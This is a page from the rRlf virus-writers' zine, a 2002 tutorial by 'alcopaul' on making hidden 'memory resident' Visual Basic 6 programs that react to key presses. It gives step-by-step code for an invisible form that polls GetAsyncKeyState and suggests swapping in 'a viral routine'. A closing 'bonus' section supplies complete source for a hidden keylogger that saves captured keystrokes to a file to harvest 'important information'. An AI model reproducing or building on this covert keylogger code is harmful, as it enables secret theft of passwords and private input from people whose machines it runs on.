<html>
<head>
<title>rRlf #2</title>
</head>
<body text="#ffffff" link="#58b3f6" vlink="#58b3f6" alink="#58b3f6" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>Infiltration of a Nation</i>
<br><table cellpadding="9">
<tr>
<th><a href="22.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="24.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>Your First Basic 'Memory Resident' Code In Visual Basic 6 by alcopaul</u></b>
<p>Back in the good old days, if you code a memory resident virus, you're considered to be competent...
<br>Most virus coders in the past realised that making a memory resident code will increase code's chance
<br>of survival in the wild ... Almost all the viruses made were memory resident.....
<p>Some programs compiled in visual basic 6 can become memory resident as long as you don't put unload me,
<br>or click the x button in the upper right corner of your form..
<br>module programs without forms to be loaded can't be memory resident coz they automatically exit..
<p>Most of malicious codes (viruses/worms) nowadays do their thing in one-ply...
<br>It means that when executed, they initialise, do its thing, the payloads and exit...
<br>They just modify the registry, enabling them to run at start up or when executing some file formats,
<br>overwrite valid files with their own codes, waiting to be executed and terminate themselves or just
<br>reside in memory without recognising any event that will trigger themselves to run again...
<br>my reference: AV sites..
<p>Our task now is to make a functional "memory-resident" code.... Without further a do, let's get it on..
<p>All codes can be memory resident..
<br>And when our code achieved this (which we can easily do in vb6), our next mission is to identify
<br>the events that will be recognised by our code and will make our code active or perform its routine again..
<br>are you with me? Sorry, I'm fuckin' sleepy but all I want is to help you, budding vb coders,
<br>so I'm still goin' on...
<p>===================================
<br>making our memory resident code
<br>===================================
<p>Start VB6, Choose Standard EXE
<p>now we'll code a memory resident program that will display a message
<p>Private Sub Form_Load()
<br>Msgbox "Hello World!"
<br>End Sub
<p>Whalla! ... Here's owr first memory resident code .. When run, it will display a message box...
<br>But you can still see the form, waiting to get terminated....
<br>Just click the x in upper right corner if you want it to be terminated... 
<br>If you don't wanna see the form, click the form, go to Properties Window and set border style to none,
<br>resize the form to its minimum..
<br>when you rerun the code, it will display the messagebox but you won't see any form..
<br>So the only way to terminate this is by alt-ctrl-del, end task, or findwindow/postmessage...
<br>&nbsp;
<br>&nbsp;
<br>&nbsp;
<br>===================================
<br>the events
<br>===================================
<p>A memory resident code is effective when it is able to recognise events and upon recognising the event,
<br>it would do its tasks again ... Simple..
<p>Many events are taking place in the pc .. File read, file open, internet connect, display text, key press etc..
<br>There are so damn numerous and we'll just consider the event that will fit our knowledge base and that is obvious..
<br>And that's key press..
<p>Introducing GetAsyncKeyState API
<p>=============================================================================================================================
<p>*** Private Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState" (ByVal vKey As Long) As Integer ***
<p>description from www.vbapi.com
<p>Platforms
<p>Windows 95: Supported. 
<br>Windows 98: Supported. 
<br>Windows NT: Requires Windows NT 3.1 or later. 
<br>Windows 2000: Supported. 
<br>Windows CE: Requires Windows CE 1.0 or later. 
<p>Description & Usage
<br>GetAsyncKeyState determines whether a certain key is currently pressed and whether that key has been
<br>pressed since the last call to the function. This function fails if the thread calling it does not
<br>currently have the input focus.
<p>Return Value
<br>If the function fails (if the current thread does not have the input focus), the function returns 0.
<br>If the &H8000 bit of the return value is set, the key has been pressed at least once since the last
<br>time the thread called GetAsyncKeyState. If the &H1 bit of the return value is set, the key is
<br>currently pressed down.
<p>Parameters
<p>vKey
<br>The virtual-key code of the key to check.
<p>The virtual-key codes identify various virtual keys. Virtual keys mainly consist of actual keyboard keys, 
<br>but also include "virtual" elements such as the three mouse buttons. The virtual keys also include many
<br>"keys" which usually do not exist at all! A key's virtual-key code does not change when modifier keys
<br>(Ctrl, Alt, Shift, etc.) are held -- e.g., the 1 key has the same virtual-key code whether 1 or ! is pressed.
<br>However, the numbers in the numeric keypad on the keyboard do have two different virtual-key codes:
<br>one for when Num Lock is on, and another for when Num Lock is off. Note that the virtual-key codes
<br>of 0-9 and A-Z equal their ASCII codes.
<br>&nbsp;
<br>&nbsp;
<br>=============================================================================================================================
<p>This API is commonly used in any keyloggers, right trojan mastahs? I was once fascinated with keyloggers
<br>and I don't know how to get start with programming any..
<br>So I went to planet source codes, scanned the samples and I found a code with this API..
<br>Using GetAsyncKeyState is so simple and you can code a working keylogger with just a few lines..
<br>Ok? Code ripping? You may say that but I'm just putting the code into good use...
<p>Now let's code...
<p>Preliminaries:
<p>Add timer to your form..
<br>Click the timer box, then be sure to set the interval...
<p>Make your form invisible by doing the steps: Click the form, go to Properties Window and set border style to none,
<br>Resize the form to its minimum..
<p>===================
<br>Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
<p>Private Sub Timer1_Timer() <------------ Interface with timer... Important
<br>On Error Resume Next <---------- Error Handling Not Allowed
<br>Dim keystate as Integer, scancodes as Integer
<br>For scancodes = 1 to 254 <------------- all the possible keys in keyboard
<br>keystate = GetAsyncKeyState(scancodes)
<br>If keystate = -32767 Then
<br>'personalised routine here
<br>End If
<br>Next
<br>End Sub
<br>===================
<p>Our skeleton routine is finished..
<br>Now we'll make it recognise the event that will trigger the execution of the code that we want to be executed
<p>Let's look below.. I must say that the data there is incomplete... I just made it...
<br>&nbsp;
<br>&nbsp;
<br>=============================================================================================================================
<br>table hex 1.1
<br>=============================================================================================================================
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Key&nbsp;&nbsp;Hex
<br>***************
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Esc&nbsp;&nbsp;1B
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;F1&nbsp;&nbsp;70
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;F2&nbsp;&nbsp;71
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;F3&nbsp;&nbsp;72
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;F4&nbsp;&nbsp;73
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;F5&nbsp;&nbsp;74
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;F6&nbsp;&nbsp;75
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;F7&nbsp;&nbsp;76
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;F8&nbsp;&nbsp;77
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;F9&nbsp;&nbsp;78
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;F10&nbsp;&nbsp;79
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;F11&nbsp;&nbsp;7A
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;F12&nbsp;&nbsp;7B
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;RKey&nbsp;&nbsp;5D
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Lock&nbsp;&nbsp;90
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Insert&nbsp;&nbsp;2D
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Home&nbsp;&nbsp;24
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PgeUp&nbsp;&nbsp;21
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PgeDown&nbsp;&nbsp;22
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;&nbsp;23
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Delete&nbsp;&nbsp;2E
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;`~&nbsp;&nbsp;C0
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1!&nbsp;&nbsp;31
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2@&nbsp;&nbsp;32
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;3#&nbsp;&nbsp;33
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;4$&nbsp;&nbsp;34
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;5%&nbsp;&nbsp;35
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;6^&nbsp;&nbsp;36
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;7&&nbsp;&nbsp;37
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;8*&nbsp;&nbsp;38
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;9(&nbsp;&nbsp;39
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0)&nbsp;&nbsp;30
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-_&nbsp;&nbsp;BD
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=+&nbsp;&nbsp;BB
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Bckspce&nbsp;&nbsp;8
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Tab&nbsp;&nbsp;9
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;q&nbsp;&nbsp;51
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;w&nbsp;&nbsp;57
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;e&nbsp;&nbsp;45
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;r&nbsp;&nbsp;52
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;t&nbsp;&nbsp;54
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;y&nbsp;&nbsp;59
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;u&nbsp;&nbsp;55
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i&nbsp;&nbsp;49
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;o&nbsp;&nbsp;4F
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;p&nbsp;&nbsp;50
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[{&nbsp;&nbsp;DB
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;]}&nbsp;&nbsp;DD
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\|&nbsp;&nbsp;DC
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Cpslock&nbsp;&nbsp;14
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;a&nbsp;&nbsp;41
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;s&nbsp;&nbsp;53
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;d&nbsp;&nbsp;44
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;f&nbsp;&nbsp;46
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;g&nbsp;&nbsp;47
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;h&nbsp;&nbsp;48
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;j&nbsp;&nbsp;4A
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;k&nbsp;&nbsp;4B
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;l&nbsp;&nbsp;4C
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;;:&nbsp;&nbsp;BA
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'"&nbsp;&nbsp;DE
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Enter&nbsp;&nbsp;D
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Shift&nbsp;&nbsp;10
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;z&nbsp;&nbsp;5A
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x&nbsp;&nbsp;58
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;c&nbsp;&nbsp;43
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;v&nbsp;&nbsp;56
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;b&nbsp;&nbsp;42
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;n&nbsp;&nbsp;4E
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;m&nbsp;&nbsp;4D
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;,<&nbsp;&nbsp;BC
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.>&nbsp;&nbsp;BE
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/?&nbsp;&nbsp;BF
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Ctrl&nbsp;&nbsp;11
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WinKey&nbsp;&nbsp;5B
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Space&nbsp;&nbsp;20
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;left&nbsp;&nbsp;25
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;up&nbsp;&nbsp;26
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;right&nbsp;&nbsp;27
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;down&nbsp;&nbsp;28
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;lclick&nbsp;&nbsp;1
<br>***************&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;rclick&nbsp;&nbsp;2
<br>=============================================================================================================================
<p>We'll select the hex representation of the key so if that key is pressed, it will trigger
<br>the execution of our routine...
<p>i.e. Enter
<p>We want to execute the routine (i.e. displaying message box) whenever Enter is pressed..
<br>Now let's add some codes to the skeleton...
<br>&nbsp;
<br>&nbsp;
<br>===================
<br>Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
<p>Private Sub Timer1_Timer()
<br>On Error Resume Next
<br>Dim keystate as Integer, scancodes as Integer
<br>For scancodes = 1 to 254
<br>keystate = GetAsyncKeyState(scancodes)
<br>If keystate = -32767 Then
<br>'the routine
<br>If Hex(scancodes) = "D" Then
<br>MsgBox "Hello world!"
<br>End If
<br>'eotheroutine
<br>End If
<br>Next
<br>End Sub
<br>===================
<p>Now we're finished .... Just run this code and everytime enter is pressed, the msgbox will appear....
<br>Fun? Yeah..
<p>So we're finished making our first effective memory resident code..
<br>You can replace the msgbox with a viral routine and you can also add another key event trigger routine to the code...
<br>It's simple as 123
<p>======================================================
<br>Bonus: A keylogger
<br>======================================================
<p>Use the skeleton...
<p>Preliminaries: 
<br>Add a textbox to your form.. 
<br>Click the textbox .. Go to window properties .. Be sure to empty the text... Then set the locked option to true..
<br>You can make the textbox invisible by setting the visible option to true...
<p>Make your form invisible by doing the steps: Click the form, go to Properties Window and set border style to none,
<br>Resize the form to its minimum..
<br>&nbsp;
<br>&nbsp;
<br>Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
<p>Private Sub Timer1_Timer() 
<br>On Error Resume Next
<br>Dim keystate as Integer, scancodes as Integer
<br>For scancodes = 1 to 254
<br>keystate = GetAsyncKeyState(scancodes)
<br>If keystate = -32767 Then
<br>Text1.Text = Text1.Text & "-" & Hex(scancodes)
<br>If Len(Text1.Text) = 3000 Then
<br>Open "c:\keypressed.txt" For Output As #1
<br>Print #1, Text1.Text
<br>Close #1
<br>Text1.Text = ""
<br>End If
<br>End If
<br>Next
<br>End Sub
<p>::: Few words from me: Scancodes is set from 1 to 254 so it will be recorded to Text1.Text everytime
<br>every possible keys are pressed ... Why should we convert scancodes to Hex? So it will be easy to read...
<br>Converting it to Chr isn't practical coz special keys such as shift, ctrl etc. return unreadable strings
<br>(a square) ... Then if Text.Text is equal to 3000 bytes, it will be recorded in a txt file..
<br>This text file are the keys that were pressed ... It is beneficial in getting important information..
<br>Period .. If you wanna analyse text file, just refer to the table hex 1.1..
<br>&nbsp;
<br>&nbsp;
<br>So that's all for now ... I hope I did help in some way...
<p>until then,
<p>alcopaul
<br>[rRlf]
<br>03/22/2k2
<br>rehashed
<p>music: goldfinger, rancid, bob marley, sex pistols, the clash, sublime
</body>
</html>
